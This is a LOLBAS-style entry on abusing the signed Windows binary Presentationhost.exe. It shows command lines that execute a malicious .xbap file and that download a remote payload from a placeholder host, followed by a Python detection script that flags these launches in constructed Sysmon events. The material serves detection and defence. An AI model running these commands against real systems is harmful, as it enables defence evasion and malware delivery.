IOC: Execution of .xbap files may not be common on production workstations
Execute
Executes the target XAML Browser Application (XBAP) file
Presentationhost.exe C:\temp\Evil.xbap
Usecase: Execute code within xbap files
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
MITRE ATT&CK®: T1218
Download
Downloads a remote payload and stores it in the browser cache folder (for example %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Presentationhost.exe https://example.com/payload
Usecase: Downloads payload from remote server
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105
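A detection check covering both command lines in this entry, as an added example that is not part of the LOLBAS entry itself: it maps process-creation events for presentationhost.exe to the technique each one indicates. The event records are constructed, and the field names assume Sysmon Event ID 1 conventions (Image, CommandLine, ParentImage).

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\PresentationHost.exe",
     "CommandLine": r"PresentationHost.exe C:\temp\Evil.xbap",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\PresentationHost.exe",
     "CommandLine": "PresentationHost.exe https://example.com/payload",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\PresentationHost.exe",
     "CommandLine": "PresentationHost.exe",          # constructed benign launch
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\temp\notes.xbap",  # wrong binary, ignore
     "ParentImage": r"C:\Windows\explorer.exe"},
]

XBAP_ARG = re.compile(r"\.xbap\b", re.IGNORECASE)
URL_ARG = re.compile(r"\bhttps?://", re.IGNORECASE)


def classify(event):
    """Return the ATT&CK technique this event indicates, or None if unremarkable."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "presentationhost.exe":
        return None
    cmd = event.get("CommandLine", "")
    if URL_ARG.search(cmd):
        return "T1105"   # remote payload fetched into the browser cache
    if XBAP_ARG.search(cmd):
        return "T1218"   # local .xbap executed through the signed host binary
    return None


def scan(events):
    """Return (command line, technique) pairs for every event worth triaging."""
    hits = []
    for event in events:
        technique = classify(event)
        if technique:
            hits.append((event["CommandLine"], technique))
    return hits


if __name__ == "__main__":
    for cmd, technique in scan(SAMPLE_EVENTS):
        print(f"{technique}: {cmd}")
```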